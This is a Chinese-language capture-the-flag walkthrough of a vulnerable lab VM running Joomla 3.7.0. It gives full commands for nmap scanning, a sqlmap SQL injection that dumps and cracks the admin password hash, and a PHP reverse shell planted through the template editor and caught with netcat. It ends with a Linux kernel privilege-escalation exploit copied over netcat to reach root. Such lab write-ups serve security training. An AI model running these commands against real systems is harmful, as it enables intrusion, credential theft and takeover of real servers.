扫描获取目标 IP 地址:192.168.67.72
nmap -sn 192.168.67.0/24

扫描获取系统及开放端口:http
nmap -A -p- 192.168.67.72

查看页面:http://192.168.67.72
得到flag:

This time, there is only one flag, one entry point and no clues.
To get the flag, you'll obviously have to gain root privileges.
How you get to be root is up to you - and, obviously, the system.
Good luck - and I hope you enjoy this little challenge. :-)

用 Wappalyzer 查看信息发现此系统为 Joomla 系统
使用 joomscan 扫描,得到 joomla 版本为:3.7.0
joomscan -u http://192.168.67.72

查看有无该版本的漏洞可利用,可以看到该版本有一页面存在 SQL 注入漏洞:
searchsploit joomla 3.7.0

将利用代码复制一份
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt /root/joomla.txt

查看:
more joomla.txt

sqlmap跑:
获取数据库:
sqlmap -u "http://192.168.67.72/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

获取表:
sqlmap -u "http://192.168.67.72/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

获取列:
sqlmap -u "http://192.168.67.72/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T #__users --columns

获取用户名和密码:
sqlmap -u "http://192.168.67.72/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C "username,password" --dump

得到用户名:admin
得到密码:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

将密码保存到 --> pwd.txt
用 john 碰撞 HASH 得到密码:snoopy
john pwd.txt
john --show pwd.txt

http://192.168.67.72/administrator页面登录,根据 Joomla 特性可知Extensions-->Templates-->Templates 可上传或修改php页面,这里选择了Beez3 Details and Files[可任意选],然后修改或上传反弹SHELL
cp /usr/share/webshells/php/php-reverse-shell.php /root/reverse.php
修改反弹到的地址为KALI:192.168.67.79,随后复制到 index.php
kali监听4444端口:
nc -vnlp 4444
浏览器打开192.168.67.72/templates/beez3/index.php即可获取反弹SHELL
pwd whoami

发现权限不是root,于是提权,首先尝试自然是看看系统本身有无漏洞:
查看系统内核信息:
uname -a
查看系统版本信息:
cat /etc/issue
cat /proc/version
得到系统版本:Ubuntu 16.04
内核:4.4.0-21-generic

searchsploit ubuntu 16.04 4.4
利用:Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation
cp /usr/share/exploitdb/exploits/linux/local/39772.txt /root/39772.txt
vim 39772.txt

文末提示到https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip下载,但由于太过久远,已被刷新,所以我们可以在github搜索:ebpf_mapfd_doubleput_exploit-master,并下载

利用nc将ebpf_mapfd_doubleput_exploit-master解压然后传送
kali:tar -zcvf - ebpf_mapfd_doubleput_exploit-master/ | nc -lp 3334
shell:nc 192.168.67.79 3334 | tar -zxvf -
查看39772.txt的例子利用方式,随后在shell中:
./compile.sh
./doubleput
cd /root
ls
cat the-flag.txt

__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)

Congratulations are in order. :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

收获:信息收集,密码破解,漏洞利用,netcat 传送文件,系统提权